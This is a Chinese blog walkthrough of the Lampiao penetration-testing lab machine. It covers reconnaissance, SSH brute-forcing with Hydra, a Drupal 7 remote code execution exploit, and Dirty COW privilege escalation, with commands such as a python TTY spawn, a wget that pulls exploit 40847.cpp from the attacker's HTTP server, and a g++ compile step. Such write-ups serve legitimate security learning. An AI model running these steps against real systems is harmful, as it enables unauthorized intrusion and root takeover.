skyler实战渗透笔记(二)—Lampiao

skyler实战渗透笔记:

笔记是为了记录实战渗透学习过程,分享渗透过程思路与方法。

请注意:

对于所有笔记中复现的终端或服务器,都是自行搭建环境或已获授权渗透的。使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

0x00 前言

0x01 信息收集

0x02 渗透get shell

0x03 提权

0x04 总结

 

 

 

0x00 前言

这次的目标比较简单,介绍不多,直接开搞。

 

0x01 信息收集

首先还是内网发现一下机器:

 

 

 OK,找到了,先端口扫一下,看看都有啥服务:

 

三个端口,80端口提供http服务,1898端口也是apache提供的http服务,还开了ssh的22端口。

|--22    ssh

|--80    http

|--1898    http

0x02 渗透getshell

先从80入手,访问下试试看:

是个有趣的静态页面,检查了下源码没什么发现。

这个时候用工具批量扫一下看看,发现目录扫描dirsearch、gobuster、dirb、御剑都没有什么有用的页面。

nikio、burpsuite漏扫也没有能利用的。

先放一边,访问下另一个1898端口看看:

看起来是一个web博客系统,有个登录框。

先点点看。。。

有两篇文章,first article和一个啥啥啥

点进两篇blog发现他们的路径:

 

 

 

 

一个node1 一个node3,然后文章中写着node2不再使用,话不多说,直接node2走起:

 

 

 看到两个文件,下面提示尝试嵌入一些声音和图像,但是没有做超链接,而是纯文本。看来是没有嵌入进来,那么直接访问试试:

 

 

 先访问图片,发现是一个二维码,扫描出来一段文字:

Try harder! muahuahua

再去访问录音听一下:

下载下来是一段音频,英文user tiago

那么很明确,用户就是tiago。

密码尝试了下harder,muahuahua但是并不对,那估计是字面意思,让爆破了。

先从页面生成下基本的密码试试:

 

 

然后神器九头蛇搞起!

 

 

 破解了ssh的密码,登上去试试:

 

 

真的进来了,看着权限有些低,还需要提权。

(Author Zhaoxuepeng https://www.cnblogs.com/Shepherdzhao)

0x03 提权

要提权,先要对网站有个整体的了解,看看哪方面可以入手提权:

 

 

看起来是自己更新的内核,4.4.0版本的。

目录扫描以下:

 

 

发现了几个目录,挨个访问下试试看:

首先是install.txt

 

 

看起来是安装Drupal的指导手册,搜了下Drupal是个开源的CMS。

然后看下CHANGELOG:

 

 

发现升级到了Drupal 7.54,那么先看看有什么漏洞:

 

 

 先用最新的2019年的RCE试了下,发现不行:

 

 

 那试下18年的这个:

 

配置好参数,执行:

 

 

 

 

 OK,成功进来了,那么拿个shell先:

 

 

 用python反弹一个tty出来:

python -c 'import pty; pty.spawn("/bin/bash")'

 

 

找到反弹shell下一步要获取root权限,通过网上对Durpal 7版本2016年都可以使用dirty(脏牛)进行提权,非常有名的一个漏洞提权,我们试一下:

 

 

命令:searchsploit dirty查找脏牛提权shell,利用40847.cpp
使用CP进行复制到本地,cp /usr/share/exploitdb/exploits/linux/local/40847.cpp

然后开启python服务器,从靶机下载这个cpp文件:

python -m SimpleHTTPServer 5555

命令:wget http://192.168.245.140:5555/40847.cpp将40847.cp上传到靶机上
命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil 编译执行

 

 

 执行完后,显示出root密码,su切换,输入密码登录成功:

 

 

 

OK,拿到了服务器root权限

0x04 总结

作为简单难度的一个渗透靶机,还是相对比较容易。其中最重要的就是信息收集,在收集过程中就逐渐形成了渗透思路。提权方法通过脏牛提权,是一个通用linux内核提权方法:

漏洞范围:
Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)
危害:

低权限用户利用该漏洞可以在众多Linux系统上实现本地提权

简要分析:

该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者passwd程序就可以达到root的目的。具体分析请查看官方分析。

最后总结一下这次的渗透思路:

1、C段扫描获取目标ip

2、信息收集-获取端口信息

3、各个端口尝试漏洞攻击

4、目录遍历发现敏感信息

5、通过Drupal漏洞获取shell

6、通过暴力破解攻击ssh获取shell

7、内核提权,脏牛提权

 

posted @ 2021-09-06 22:21  XuepengZ  阅读(187)  评论(0编辑  收藏  举报